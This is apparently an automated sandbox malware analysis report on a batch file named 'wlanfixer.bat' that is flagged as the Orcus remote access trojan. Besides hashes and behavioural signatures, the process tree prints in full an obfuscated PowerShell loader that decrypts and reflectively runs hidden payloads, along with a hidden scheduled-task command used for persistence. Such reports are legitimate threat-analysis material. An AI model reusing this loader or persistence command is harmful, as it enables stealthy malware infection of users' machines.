Analysis
  max time kernel:   147s
  max time network:  152s
  platform:          windows11-21h2_x64
  resource:          win11-20240412-en
  resource tags:     arch:x64, arch:x86, image:win11-20240412-en, locale:en-us, os:windows11-21h2-x64, system
  submitted:         23/04/2024, 13:04
  Static task:       static1
  Behavioral task:   behavioral1 (sample wlanfixer.bat, resource win7-20240221-en)
  Behavioral task:   behavioral2 (sample wlanfixer.bat, resource win10-20240404-en)
  Behavioral task:   behavioral3 (sample wlanfixer.bat, resource win10v2004-20240412-en)
General
  Target:  wlanfixer.bat
  Size:    3.5MB
  MD5:     45730c9d81cdc2677ea2bd082eb79edb
  SHA1:    7ece7b975ab6506d83dac94f685e2cedbe56dd6b
  SHA256:  31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
  SHA512:  d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
  SSDEEP:  49152:mR8s3zr/pxAN80OHguszxrEC/agxlnUrLvlKNNwI:d
Malware Config
Signatures
  Orcurs Rat Executable (1 IoC)
    resource                                                                     yara_rule
    behavioral4/memory/1596-53-0x000001FCD6DE0000-0x000001FCD70DA000-memory.dmp  orcus

  Blocklisted process makes network request (11 IoCs)
    flow  pid   Process
    1     1596  powershell.exe
    2     1596  powershell.exe
    5     1596  powershell.exe
    6     1596  powershell.exe
    7     1596  powershell.exe
    8     1596  powershell.exe
    9     1596  powershell.exe
    11    1596  powershell.exe
    12    1596  powershell.exe
    13    1596  powershell.exe
    14    1596  powershell.exe

  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).

  Modifies registry class (1 IoC)
    description  ioc                                                                                    Process
    Key created  \REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000_Classes\Local Settings  powershell.exe

  Suspicious behavior: EnumeratesProcesses (6 IoCs)
    pid   Process
    4192  powershell.exe
    4192  powershell.exe
    3696  powershell.exe
    3696  powershell.exe
    1596  powershell.exe
    1596  powershell.exe

  Suspicious use of AdjustPrivilegeToken (64 IoCs)
    description                          pid   Process
    Token: SeDebugPrivilege              4192  powershell.exe
    Token: SeDebugPrivilege              3696  powershell.exe
    Token: SeIncreaseQuotaPrivilege      3696  powershell.exe
    Token: SeSecurityPrivilege           3696  powershell.exe
    Token: SeTakeOwnershipPrivilege      3696  powershell.exe
    Token: SeLoadDriverPrivilege         3696  powershell.exe
    Token: SeSystemProfilePrivilege      3696  powershell.exe
    Token: SeSystemtimePrivilege         3696  powershell.exe
    Token: SeProfSingleProcessPrivilege  3696  powershell.exe
    Token: SeIncBasePriorityPrivilege    3696  powershell.exe
    Token: SeCreatePagefilePrivilege     3696  powershell.exe
    Token: SeBackupPrivilege             3696  powershell.exe
    Token: SeRestorePrivilege            3696  powershell.exe
    Token: SeShutdownPrivilege           3696  powershell.exe
    Token: SeDebugPrivilege              3696  powershell.exe
    Token: SeSystemEnvironmentPrivilege  3696  powershell.exe
    Token: SeRemoteShutdownPrivilege     3696  powershell.exe
    Token: SeUndockPrivilege             3696  powershell.exe
    Token: SeManageVolumePrivilege       3696  powershell.exe
    Token: 33                            3696  powershell.exe
    Token: 34                            3696  powershell.exe
    Token: 35                            3696  powershell.exe
    Token: 36                            3696  powershell.exe
    Token: SeIncreaseQuotaPrivilege      3696  powershell.exe
    Token: SeSecurityPrivilege           3696  powershell.exe
    Token: SeTakeOwnershipPrivilege      3696  powershell.exe
    Token: SeLoadDriverPrivilege         3696  powershell.exe
    Token: SeSystemProfilePrivilege      3696  powershell.exe
    Token: SeSystemtimePrivilege         3696  powershell.exe
    Token: SeProfSingleProcessPrivilege  3696  powershell.exe
    Token: SeIncBasePriorityPrivilege    3696  powershell.exe
    Token: SeCreatePagefilePrivilege     3696  powershell.exe
    Token: SeBackupPrivilege             3696  powershell.exe
    Token: SeRestorePrivilege            3696  powershell.exe
    Token: SeShutdownPrivilege           3696  powershell.exe
    Token: SeDebugPrivilege              3696  powershell.exe
    Token: SeSystemEnvironmentPrivilege  3696  powershell.exe
    Token: SeRemoteShutdownPrivilege     3696  powershell.exe
    Token: SeUndockPrivilege             3696  powershell.exe
    Token: SeManageVolumePrivilege       3696  powershell.exe
    Token: 33                            3696  powershell.exe
    Token: 34                            3696  powershell.exe
    Token: 35                            3696  powershell.exe
    Token: 36                            3696  powershell.exe
    Token: SeIncreaseQuotaPrivilege      3696  powershell.exe
    Token: SeSecurityPrivilege           3696  powershell.exe
    Token: SeTakeOwnershipPrivilege      3696  powershell.exe
    Token: SeLoadDriverPrivilege         3696  powershell.exe
    Token: SeSystemProfilePrivilege      3696  powershell.exe
    Token: SeSystemtimePrivilege         3696  powershell.exe
    Token: SeProfSingleProcessPrivilege  3696  powershell.exe
    Token: SeIncBasePriorityPrivilege    3696  powershell.exe
    Token: SeCreatePagefilePrivilege     3696  powershell.exe
    Token: SeBackupPrivilege             3696  powershell.exe
    Token: SeRestorePrivilege            3696  powershell.exe
    Token: SeShutdownPrivilege           3696  powershell.exe
    Token: SeDebugPrivilege              3696  powershell.exe
    Token: SeSystemEnvironmentPrivilege  3696  powershell.exe
    Token: SeRemoteShutdownPrivilege     3696  powershell.exe
    Token: SeUndockPrivilege             3696  powershell.exe
    Token: SeManageVolumePrivilege       3696  powershell.exe
    Token: 33                            3696  powershell.exe
    Token: 34                            3696  powershell.exe
    Token: 35                            3696  powershell.exe

  Suspicious use of FindShellTrayWindow (1 IoC)
    pid   Process
    1596  powershell.exe

  Suspicious use of SendNotifyMessage (1 IoC)
    pid   Process
    1596  powershell.exe

  Suspicious use of WriteProcessMemory (10 IoCs)
    description                       pid   Process         procid_target
    PID 564 wrote to memory of 4192   564   cmd.exe         81
    PID 564 wrote to memory of 4192   564   cmd.exe         81
    PID 4192 wrote to memory of 3696  4192  powershell.exe  82
    PID 4192 wrote to memory of 3696  4192  powershell.exe  82
    PID 4192 wrote to memory of 2360  4192  powershell.exe  85
    PID 4192 wrote to memory of 2360  4192  powershell.exe  85
    PID 2360 wrote to memory of 1240  2360  WScript.exe     86
    PID 2360 wrote to memory of 1240  2360  WScript.exe     86
    PID 1240 wrote to memory of 1596  1240  cmd.exe         88
    PID 1240 wrote to memory of 1596  1240  cmd.exe         88
Processes
  (depth 1) C:\Windows\system32\cmd.exe (PID 564)
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat"
    Signatures: Suspicious use of WriteProcessMemory

    (depth 2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4192)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      Signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3696)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_816_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_816.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

      (depth 3) C:\Windows\System32\WScript.exe (PID 2360)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_816.vbs"
        Signatures: Suspicious use of WriteProcessMemory

        (depth 4) C:\Windows\system32\cmd.exe (PID 1240)
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_816.bat" "
          Signatures: Suspicious use of WriteProcessMemory

          (depth 5) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1596)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Roaming\startup_str_816.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Downloads